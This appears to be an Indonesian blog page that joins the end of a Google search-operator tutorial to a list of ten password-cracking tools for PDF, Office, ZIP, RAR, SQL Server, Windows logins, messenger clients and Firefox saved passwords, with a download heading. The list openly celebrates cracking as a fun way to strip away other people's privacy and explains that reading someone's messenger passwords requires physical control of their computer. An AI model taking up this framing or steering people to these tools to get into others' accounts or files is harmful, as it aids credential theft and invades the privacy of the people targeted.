Hasilnya google akan mencari file berbentuk pdf atau doc yang mengandung kata motivasi belajar. Hasil pencarian dapat langsung kita download dengan cara klik kanan hasil pencarian kemudian Save As.
Namun jika kita ingin melihat isi filenya terlebih dahulu, klik saja tulisan "lihat html" pada hasil pencarian.

Okey...untuk pertama cukup lima ini dulu yang harus kamu kuasai. Tips 6 - 10 akan kuberikan setelah ini...he2x...jangan kecewa dulu karena ilmu yang efektif adalah ilmu yang dipelajari secara bertahap, deal...!.
Kelima dasar pencarian ini harus benar-benar kamu kuasai dan dimengerti sebelum melangkah ke tips berikutnya. Kelima tips ini dapat dikombinasikan sehingga mengasilkan pencarian yang lebih akurat. Sebagai contoh kombinasi filetype:.. dan +/-, atau site:.. dan ".." atau filetype:.. dan "...". dan lain sebagainya.
Misalnya pencarian: prestasi belajar
ketik di google: filetype:pdf | filetype:doc "prestasi belajar"
atau "prestasi belajar" -kerja

Selamat bereksperimen dan tunggu tips berikutnya...

Koleksi Software pembobol password

Membobol, menjebol, membongkar, membuka password adalah aktifitas menyenangkan untuk menelanjangi privacy orang lain. Berbagai file telah dilengkapi password pelindung, misalnya microsoft office, PDF, Rar, Zip, administrator windows, SQL, exe, mozilla, dan lain-lain. Program/software/tools pembobol password pada umumnya berbayar. Jarang sekali yang diberikan gratis, kalaupun ada kemampuanya tidak mumpuni. Berikut ini saya berikan 10 program pembobol password dan yang menarik menurut saya, beserta beberapa password manajer lainya.

1. PDF Password


PDF Password dapat membongkar password yang melindungi file PDF. Program ini hanya mampu membongkar User permission password. PDF Password tidak dapat menerobos DRM (Digital Right Management) atau perlindungan copy digital pada PDF. Jika sebuah dokumen PDF tidak bisa dibuka karena dilindungi password, program ini dapat membongkarnya dengan mudah.

2. Windows Password Cracker


Windows Password Cracker dapat dengan mudah membobol password yang tidak terenkripsi dengan baik di sistem operasi windows. Windows password cracker dilengkapi dengan 53.000 kata berbahasa inggris sebagai ditctionary attack. Sebuah program sederhana namun cepat untuk membongkar password windows.

3. Atomic ZIP Password Cracker


Program ini digunakan untuk membongkar password file berformat ZIP. Atomic ZIP Password Cracker dapat dengam mudah menemukan password file ZIP dengan berbagai metode, yaitu Brute force atau penyerangan terus menerus atau dengan dictionary attack. Interface program ini juga mudah digunakan selain kecepatan pembongkaran password yang ditawarkan.

4. Nucleus Kernel SQL Password Recovery


Program ini digunakan untuk membuka password MDF (Master Data File) dari database SQL Server 2000. Nucleus Kernel SQL Password Recovery mampu mengembalikan semua password SQL yang tersimpan di sistem. File MDF sebenarnya diproteksi dengan algoritma password yang cukup kuat. Tidak mudah untuk mengenskripsi passwordnya kembali. Namun demikian, program ini mampu merekursif password dan secara otomatis menggeneratenya. Hasilnya dibuat sebuah password alternatif sebagai pengganti password aslinya. Keren bukan.

5. Password recovery for microsoft office


Seperti namanya, program ini mampu membongkar password dokumen microsoft office. Hampir seluruh jenis file microsoft office, baik Microsoft office word, excel, power point, access dan tentunya outlook. Dari percobaan yang saya lakukan, program ini mampu membuka kombinasi password 6 karakter dengan cepat.

6. Windows password unlocker


Windows password unlocker sepertinya adalah jagoan saya. Program ini adalah pelopor pembobol login administrator windows dengan tampilan grafis. Tidak seperti program lain yang umumnya berbasis text, Windows password unlocker mampu membobol password login windows 2000/2003/NT/XP/Vista dan tentunya windows 7. Tidak perlu melakukan instalasi ulang sistem operasi anda, cukup gunakan program ini yang dibooting dari CD, kemudian ikuti langkah-langkah mudahnya.

7. RAR Password Recovery


RAR Password recovery mampu diandalkan sebagai pembongkar password file berformat RAR. Dilengkapi dengan tiga teknik pembobol password umum seperti Brute force, boost up dan dictionary attack. RAR Password Recovery juga dilengkapi resume progress yang dapat mengulang proses pembobolan password di lain waktu.

8. MessenPass


MessenPass seperti namanya digunakan untuk mengobok-obok password messenger client seperti Yahoo Messenger, MSN Messenger, Trilian, Miranda, Google Talk, dll. MessenPass hanya mampu membobol password messenger yang disetting "remember password", selain itu program ini hanya berjalan di komputer lokal. Artinya untuk membobol password messenger seseorang, anda harus secara fisik menguasai komputer lawan.

9. Asterik Logger


Asterik Logger digunakan untuk mendapatkan password yang tersembunyi di balik asterik (bintang). Beberapa program seperti FTP Clinet, dan Mail Client biasanya menampilkan ******* pada kotak password. Dengan program ini anda dapat menampilkan password dibalik bintang tersebut.

10. PasswordFox


Dari namanya mungkin anda telah bisa menebaknya. Benar sekali Password Fox digunakan untuk memunculkan password yang tersimpan di dalam browser mozilla firefox. Kebiasaan seseorang yang menyimpan password di cache memory web browser dapat dimanfaatkan untuk diintip passwordnya menggunakan Password Fox.

DOWNLOAD SOFTWARE PEMBOBOL PASSWORD


Sumber : Ide capung